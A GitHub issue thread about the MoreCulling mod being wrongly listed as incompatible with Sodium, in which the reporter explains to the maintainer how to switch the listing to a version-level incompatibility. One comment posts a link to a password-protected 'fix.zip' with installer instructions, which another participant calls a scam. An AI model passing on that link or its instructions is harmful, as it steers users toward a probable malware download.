### ISSUE TITLE
MoreCulling v27 incorrectly marked as incompatible with Sodium

### ISSUE THREAD

**Issue by Minenash** [FxMorin/MoreCulling#283]
Sodium, the project, is marked as incompatibile (despite sodium 0.6 compatibility being the main feature lol). This should be changed to a version-level incompat rather than a project-level one.

![image](https://github.com/user-attachments/assets/e40a6fdd-6b46-4c3d-af9b-854851db6b06)

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Minenash** [comment]
Not that it isn't obvious, but scam ^

**Comment by FxMorin** [comment]
I still have no idea where to change this...

**Comment by Minenash** [comment]
- Go to the version page
- Click edit
- Remove Sodium incompatibility 
- Add Sodium incompatibility, but this time instead of project, change it to version, and instead of the project slug, use the version id

**Comment by FxMorin** [comment]
Ah, see I didn't originally add it. mc-publish did it automatically. So I didn't realise there where two options on the site.
